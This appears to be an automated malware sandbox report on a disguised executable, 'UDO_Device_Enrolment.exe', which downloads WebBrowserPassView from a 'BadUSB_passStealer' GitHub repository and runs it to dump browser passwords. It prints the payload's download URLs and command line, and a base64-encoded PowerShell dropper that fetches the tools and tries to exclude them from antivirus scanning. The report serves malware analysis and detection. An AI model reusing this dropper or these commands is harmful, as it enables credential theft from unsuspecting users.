Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: WebBrowserPassView.exe, 00000001.00000003.280989815.0000000002303000.00000004.00000800.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: WebBrowserPassView.exe, 00000001.00000003.280989815.0000000002303000.00000004.00000800.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: WebBrowserPassView.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://pki.goog/repository/0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: UDO_Device_Enrolment.exe, 00000000.00000002.333840861.0000000002985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: UDO_Device_Enrolment.exe, 00000000.00000002.333752118.0000000002932000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/tuconnaisyouknow/BadUSB_passStealer/main/other_files/WebBrowserPas
Source: UDO_Device_Enrolment.exe, UDO_Device_Enrolment.exe, 00000000.00000002.332722721.0000000002727000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/tuconnaisyouknow/BadUSB_passStealer/main/other_files/fin.ps1
Source: UDO_Device_Enrolment.exe, 00000000.00000002.333840861.0000000002985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.comx
Source: UDO_Device_Enrolment.exe, 00000000.00000002.333752118.0000000002932000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://render.githubusercontent.com
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/
Source: WebBrowserPassView.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js

Source: unknown

DNS traffic detected: queries for: github.com

Source: global traffic	HTTP traffic detected: GET /tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?raw=true HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.17134.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tuconnaisyouknow/BadUSB_passStealer/raw/main/other_files/WebBrowserPassView.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.17134.1Host: github.comCookie: _gh_sess=MZmDdE9N3n1fZSys9nAuN8sTDFDwG7U0FgKWhMqqNtlWY62yST4FqHZkoMHKheFDseJfzzCkhFXsGv9MtR%2FEIGIFAiPnJ3d8Gvw4p2BD2QrbWXPVxiZInfPE%2BN%2B1djhqNUB1qgzwq9AQj5gkNyGVZNt5rJDCXdx2Vq0A5N6mLxOqEU8Qy%2BY6zN%2FFRRbMpZw19GiUj6Sm9rJxVxQpWXsw7ldIUUYJDjVVJtM5l3s5AvLm05JNAXbCNDyaHWUafjqf%2BoGyrpKbhx%2BJXHGmDHSbVg%3D%3D--WTlSr%2BGITxfRfJ9w--29doTZR60AO2ufhYeUfmfQ%3D%3D; _octo=GH1.1.1468486099.1664130543; logged_in=no
Source: global traffic	HTTP traffic detected: GET /tuconnaisyouknow/BadUSB_passStealer/main/other_files/WebBrowserPassView.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.17134.1Host: raw.githubusercontent.comConnection: Keep-Alive

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_0041138D OpenClipboard,GetLastError,DeleteFileW,

1_2_0041138D

Source: UDO_Device_Enrolment.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Code function: 0_2_00007FFBAD20034F	0_2_00007FFBAD20034F
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Code function: 0_2_00007FFBAD205733	0_2_00007FFBAD205733
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Code function: 0_2_00007FFBAD2B35B9	0_2_00007FFBAD2B35B9
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044A030	1_2_0044A030
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0040612B	1_2_0040612B
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0043E13D	1_2_0043E13D
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044B188	1_2_0044B188
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00442273	1_2_00442273
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044D380	1_2_0044D380
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044A5F0	1_2_0044A5F0
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_004125F6	1_2_004125F6
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_004065BF	1_2_004065BF
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_004086CB	1_2_004086CB
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_004066BC	1_2_004066BC
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044D760	1_2_0044D760
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00405A40	1_2_00405A40
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00449A40	1_2_00449A40
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00405AB1	1_2_00405AB1
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00405B22	1_2_00405B22
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044ABC0	1_2_0044ABC0
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00405BB3	1_2_00405BB3
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00417C60	1_2_00417C60
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044CC70	1_2_0044CC70
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00418CC9	1_2_00418CC9
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044CDFB	1_2_0044CDFB
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044CDA0	1_2_0044CDA0
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044AE20	1_2_0044AE20
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00415E3E	1_2_00415E3E
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00437F3B	1_2_00437F3B

Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: String function: 0044DDB0 appears 33 times
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: String function: 004186B6 appears 58 times
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: String function: 004188FE appears 88 times
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: String function: 00418555 appears 34 times

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,

1_2_0040BAE3

Source: UDO_Device_Enrolment.exe, 00000000.00000002.331852477.0000000002562000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs UDO_Device_Enrolment.exe
Source: UDO_Device_Enrolment.exe, 00000000.00000002.331173990.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs UDO_Device_Enrolment.exe
Source: UDO_Device_Enrolment.exe, 00000000.00000002.331725660.0000000002511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs UDO_Device_Enrolment.exe

Source: UDO_Device_Enrolment.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WebBrowserPassView.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WebBrowserPassView.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WebBrowserPassView.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WebBrowserPassView.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WebBrowserPassView.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WebBrowserPassView.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WebBrowserPassView.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WebBrowserPassView.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WebBrowserPassView.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WebBrowserPassView.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: UDO_Device_Enrolment.exe

ReversingLabs: Detection: 40%

Source: UDO_Device_Enrolment.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UDO_Device_Enrolment.exe "C:\Users\user\Desktop\UDO_Device_Enrolment.exe"
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process created: C:\temp\Windows32\WebBrowserPassView.exe "C:\temp\Windows32\WebBrowserPassView.exe" /stext HWID.txt
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process created: C:\temp\Windows32\WebBrowserPassView.exe "C:\temp\Windows32\WebBrowserPassView.exe" /stext HWID.txt	Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\temp\Windows32\WebBrowserPassView.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UDO_Device_Enrolment.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

File created: C:\temp\Windows32

Jump to behavior

Source: classification engine

Classification label: mal80.troj.spyw.winEXE@3/4@4/3

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

1_2_0041A6AF

Source: WebBrowserPassView.exe, WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: WebBrowserPassView.exe, WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: WebBrowserPassView.exe, WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: WebBrowserPassView.exe, WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: WebBrowserPassView.exe, WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: WebBrowserPassView.exe, 00000001.00000002.286790226.0000000002312000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: WebBrowserPassView.exe, WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

1_2_0041A225

Source: UDO_Device_Enrolment.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_00415799 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,

1_2_00415799

Source: UDO_Device_Enrolment.exe, MainApp.cs	Base64 encoded string: 'TmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVBhdGggJ0M6XHRlbXBcV2luZG93czMyJyANClNldC1Mb2NhdGlvbiBDOlx0ZW1wXFdpbmRvd3MzMiAjR28gdG8gdGhlIGZvbGRlciBpbiB3aGljaCB3ZSB3aWxsIGRvbndsb2FkIGZpbGVzDQojQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uRXh0ZW5zaW9uIGV4ZSAtRm9yY2UgI0FkZCBleGNlcHRpb24gZm9yIC5leGUgZmlsZXMgaW4gYW50aXZpcnVzDQojSW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3R1Y29ubmFpc3lvdWtub3cvQmFkVVNCX3Bhc3NTdGVhbGVyL21haW4vb3RoZXJfZmlsZXMvZmluLnBzMSAtT3V0RmlsZSBmaW4ucHMxICNEb3dubG9hZCBmaW5hbCAucHMxIGZpbGUgdG8gZGVsZXRlIGFsbCAudHh0IGZpbGVzIGFuZCBzdG9wIGFsbCBwb3dlcnNoZWxsIHByb2Nlc3MNCiNJbnZva2UtV2ViUmVxdWVzdCBodHRwczovL2dpdGh1Yi5jb20vdHVjb25uYWlzeW91a25vdy9CYWRVU0JfcGFzc1N0ZWFsZXIvYmxvYi9tYWluL290aGVyX2ZpbGVzL0Jyb3dzaW5nSGlzdG9yeVZpZXcuZXhlP3Jhdz10cnVlIC1PdXRGaWxlIEJyb3dzaW5nSGlzdG9yeVZpZXcuZXhlICNEb3dubG9hZCB0aGUgbmlyc29mdCB0b29sIGZvciBCcm93c2VyaGlzdG9yeQ0KI0ludm9rZS1XZWJSZXF1ZXN0IGh0dHBzOi8vZ2l0aHViLmNvbS90dWNvbm5haXN5b3Vrbm93L0JhZFVTQl9wYXNzU3RlYWxlci9ibG9iL21haW4vb3RoZXJfZmlsZXMvV05ldFdhdGNoZXIuZXhlP3Jhdz10cnVlIC1PdXRGaWxlIFdOZXRXYXRjaGVyLmV4ZSAjRG93bmxvYWQgdGhlIG5pcnNvZnQgdG9vbCBmb3IgY29ubmVjdGVkIGRldmNlcw0KSW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9naXRodWIuY29tL3R1Y29ubmFpc3lvdWtub3cvQmFkVVNCX3Bhc3NTdGVhbGVyL2Jsb2IvbWFpbi9vdGhlcl9maWxlcy9XZWJCcm93c2VyUGFzc1ZpZXcuZXhlP3Jhdz10cnVlIC1PdXRGaWxlIFdlYkJyb3dzZXJQYXNzVmlldy5leGUgI0Rvd25sb2FkIHRoZSBuaXJzb2Z0IHRvb2wg